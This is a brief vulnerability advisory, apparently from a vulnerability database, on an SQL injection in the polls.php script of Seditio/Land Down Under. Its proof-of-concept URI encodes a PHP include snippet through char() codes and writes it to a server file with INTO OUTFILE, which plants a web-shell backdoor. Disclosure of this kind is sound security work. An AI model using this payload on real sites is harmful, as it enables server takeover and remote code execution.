|
Seditio/Land Down Under Polls.PHP SQL Injection Vulnerability
An attacker can exploit this issue via a web client. The following proof-of-concept URI is available: http://www.example.com/polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/* |
|
Privacy Statement |